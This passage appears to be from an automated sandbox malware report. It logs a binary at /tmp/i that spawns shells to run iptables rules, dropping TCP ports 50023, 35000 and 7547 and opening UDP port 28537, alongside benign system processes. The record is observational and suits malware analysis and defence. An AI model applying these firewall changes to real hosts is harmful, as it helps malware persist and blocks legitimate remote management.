                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5100 Parent PID: 5097

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5100 Parent PID: 5097

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --sport 50023 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5118 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5118 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5124 Parent PID: 5118

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5124 Parent PID: 5118

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --sport 35000 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5130 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5130 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5140 Parent PID: 5130

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5140 Parent PID: 5130

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p tcp --dport 7547 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5159 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5159 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5164 Parent PID: 5159

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5164 Parent PID: 5159

                                                                                                          General

                                                                                                          Start time:19:31:30
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p tcp --sport 7547 -j DROP
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5181 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5181 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5183 Parent PID: 5181

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5183 Parent PID: 5181

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p udp --destination-port 28537 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5184 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5184 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5189 Parent PID: 5184

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5189 Parent PID: 5184

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p udp --source-port 28537 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5213 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5213 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5220 Parent PID: 5213

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5220 Parent PID: 5213

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I PREROUTING -t nat -p udp --destination-port 28537 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5235 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5235 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5240 Parent PID: 5235

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5240 Parent PID: 5235

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I POSTROUTING -t nat -p udp --source-port 28537 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5241 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5241 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I INPUT -p udp --dport 28537 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5243 Parent PID: 5241

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5243 Parent PID: 5241

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I INPUT -p udp --dport 28537 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5244 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5244 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5249 Parent PID: 5244

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5249 Parent PID: 5244

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I OUTPUT -p udp --sport 28537 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5268 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5268 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5282 Parent PID: 5268

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5282 Parent PID: 5268

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I PREROUTING -t nat -p udp --dport 28537 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: i PID: 5308 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/tmp/i
                                                                                                          Arguments:n/a
                                                                                                          File size:307960 bytes
                                                                                                          MD5 hash:eec5c6c219535fba3a0492ea8118b397

                                                                                                          Analysis Process: sh PID: 5308 Parent PID: 4562

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT"
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 5315 Parent PID: 5308

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: iptables PID: 5315 Parent PID: 5308

                                                                                                          General

                                                                                                          Start time:19:31:35
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/iptables
                                                                                                          Arguments:iptables -I POSTROUTING -t nat -p udp --sport 28537 -j ACCEPT
                                                                                                          File size:13 bytes
                                                                                                          MD5 hash:e986504da7dab031032b3d3eac5b643e

                                                                                                          Analysis Process: upstart PID: 4597 Parent PID: 3310

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/upstart
                                                                                                          Arguments:n/a
                                                                                                          File size:0 bytes
                                                                                                          MD5 hash:00000000000000000000000000000000

                                                                                                          Analysis Process: sh PID: 4597 Parent PID: 3310

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4617 Parent PID: 4597

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: date PID: 4617 Parent PID: 4597

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/date
                                                                                                          Arguments:date
                                                                                                          File size:68464 bytes
                                                                                                          MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                          Analysis Process: sh PID: 4646 Parent PID: 4597

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: apport-checkreports PID: 4646 Parent PID: 4597

                                                                                                          General

                                                                                                          Start time:19:31:24
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/usr/share/apport/apport-checkreports
                                                                                                          Arguments:/usr/bin/python3 /usr/share/apport/apport-checkreports --system
                                                                                                          File size:1269 bytes
                                                                                                          MD5 hash:1a7d84ebc34df04e55ca3723541f48c9

                                                                                                          Analysis Process: upstart PID: 4803 Parent PID: 3310

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/upstart
                                                                                                          Arguments:n/a
                                                                                                          File size:0 bytes
                                                                                                          MD5 hash:00000000000000000000000000000000

                                                                                                          Analysis Process: sh PID: 4803 Parent PID: 3310

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4812 Parent PID: 4803

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: date PID: 4812 Parent PID: 4803

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/date
                                                                                                          Arguments:date
                                                                                                          File size:68464 bytes
                                                                                                          MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                          Analysis Process: sh PID: 4813 Parent PID: 4803

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: apport-gtk PID: 4813 Parent PID: 4803

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/usr/share/apport/apport-gtk
                                                                                                          Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                          File size:23806 bytes
                                                                                                          MD5 hash:ec58a49a30ef6a29406a204f28cc7d87

                                                                                                          Analysis Process: upstart PID: 4830 Parent PID: 3310

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/sbin/upstart
                                                                                                          Arguments:n/a
                                                                                                          File size:0 bytes
                                                                                                          MD5 hash:00000000000000000000000000000000

                                                                                                          Analysis Process: sh PID: 4830 Parent PID: 3310

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:/bin/sh -e /proc/self/fd/9
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: sh PID: 4831 Parent PID: 4830

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: date PID: 4831 Parent PID: 4830

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/date
                                                                                                          Arguments:date
                                                                                                          File size:68464 bytes
                                                                                                          MD5 hash:54903b613f9019bfca9f5d28a4fff34e

                                                                                                          Analysis Process: sh PID: 4832 Parent PID: 4830

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/bin/sh
                                                                                                          Arguments:n/a
                                                                                                          File size:4 bytes
                                                                                                          MD5 hash:e02ea3c3450d44126c46d658fa9e654c

                                                                                                          Analysis Process: apport-gtk PID: 4832 Parent PID: 4830

                                                                                                          General

                                                                                                          Start time:19:31:25
                                                                                                          Start date:06/01/2021
                                                                                                          Path:/usr/share/apport/apport-gtk
                                                                                                          Arguments:/usr/bin/python3 /usr/share/apport/apport-gtk
                                                                                                          File size:23806 bytes
                                                                                                          MD5 hash:ec58a49a30ef6a29406a204f28cc7d87